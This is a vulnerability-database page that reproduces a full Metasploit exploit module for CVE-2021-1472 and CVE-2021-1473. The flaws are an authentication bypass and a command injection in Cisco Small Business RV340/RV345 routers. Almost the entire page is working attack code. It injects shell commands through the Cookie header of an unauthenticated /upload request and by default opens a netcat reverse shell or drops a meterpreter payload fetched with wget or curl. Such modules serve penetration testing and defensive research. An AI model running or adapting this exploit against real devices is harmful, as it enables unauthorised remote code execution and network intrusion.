Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Cisco Small Business RV Series Authentication Bypass / Command Injection

Related Vulnerabilities: CVE-2021-1472   CVE-2021-1473  
Publish Date: 01 Feb 2022
Author: jbaines-r7, Takeshi Shiomitsu, metasploit.com
Source 
                							

                ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco Small Business RV Series Authentication Bypass and Command Injection',
        'Description' => %q{
          This module exploits an authentication bypass (CVE-2021-1472) and command injection (CVE-2021-1473)
          in the Cisco Small Business RV series of VPN/routers. The device does not adequately verify the
          credentials in the HTTP Authorization field when requests are made to the /upload endpoint. Then
          the upload.cgi binary will use the contents of the HTTP Cookie field as part of a `curl` request
          aimed at an internal endpoint. The curl request is executed using `popen` and allows the attacker
          to inject commands via the Cookie field.

          A remote and unauthenticated attacker using this module is able to achieve code execution as `www-data`.

          This module affects the RV340, RV340w, RV345, and RV345P using firmware versions 1.0.03.20 and below.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Takeshi Shiomitsu', # Vulnerability discovery
          'jbaines-r7' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2021-1472' ],
          [ 'CVE', '2021-1473' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx'],
          [ 'URL', 'https://seclists.org/fulldisclosure/2021/Apr/39' ],
          [ 'URL', 'https://www.iot-inspector.com/blog/advisory-cisco-rv34x-authentication-bypass-remote-command-execution/' ]
        ],
        'DisclosureDate' => '2021-04-07',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => false,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'Payload' => {
                'BadChars' => '\''
              },
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'Payload' => {
                'BadChars' => '\''
              },
              'CmdStagerFlavor' => [ 'wget', 'curl' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'MeterpreterTryToFork' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Sends the exploit. Authentication bypass is successful as long as the authorization field
  # is present (we add a valid base64 value as well). Command injection occurs in the cookie
  # field. Otherwise, various values need to be present in the /upload to satisfy the upload
  # configuration logic. Randomized values to the best of our ability.
  # @return res
  def send_exploit(cmd)
    options = Rex::Text.rand_text_alphanumeric(5..12)
    destination = Rex::Text.rand_text_alphanumeric(5..12)
    filepath = Rex::Text.rand_text_alphanumeric(5..12)
    filename = Rex::Text.rand_text_alphanumeric(5..12)
    filexml = Rex::Text.rand_text_alphanumeric(5..12)
    uploadname = Rex::Text.rand_text_alphanumeric(5..12)
    auth = Rex::Text.encode_base64("#{Rex::Text.rand_text_alphanumeric(5..12)}:#{Rex::Text.rand_text_alphanumeric(5..12)}")

    multipart_form = Rex::MIME::Message.new
    multipart_form.add_part(options, nil, nil, 'form-data; name="option"')
    multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
    multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
    multipart_form.add_part(filexml, 'application/xml', nil, 'form-data; name="file"; filename="config.xml"')
    multipart_form.add_part("#{filename}.xml", nil, nil, 'form-data; name="filename"')

    # this xml data required as is
    multipart_form.add_part('<input><fileType>configuration</fileType><source><location-url>' \
      'FILE://Configuration/config.xml</location-url></source><destination><config-type>' \
      'config-running</config-type></destination></input>', nil, nil, "form-data; name=\"#{uploadname}\"")

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/upload'),
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
      'headers' => {
        'Cookie' => "sessionid='`#{cmd}`'",
        'Authorization' => auth
      },
      'data' => multipart_form.to_s
    }, 10)
  end

  # The system doesn't have a good way to snag the version. This check attempts the exploit
  # with a command that returns immediately (id) and checks that the response looks like
  # how a vulnerable target would respond.
  def check
    res = send_exploit('id')
    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200

    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
    end

    CheckCode::Safe('The target did not respond with an expected payload.')
  end

  def execute_command(cmd, _opts = {})
    # parsing of the cookie field is thrown off by ;. Replacing with && works fine, but the only
    # downside is if the payload fails then it won't clean up after itself. Oddly, device's sh
    # required the spacing.
    cmd = cmd.gsub(/;/, ' && ')
    res = send_exploit(cmd)

    # unix command holds the connection open. Meterpreter should not. I think this logic is fine though.
    # If :unix_cmd gets a good check() value and then send_exploit returns with a nil response
    # then that is a clear sign that :unix_cmd was successful
    if target['Type'] != :unix_cmd
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
      body_json = res.get_json_document
      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
    end

    print_good('Exploit successfully executed.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(linemax: 120)
    end
  end
end
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started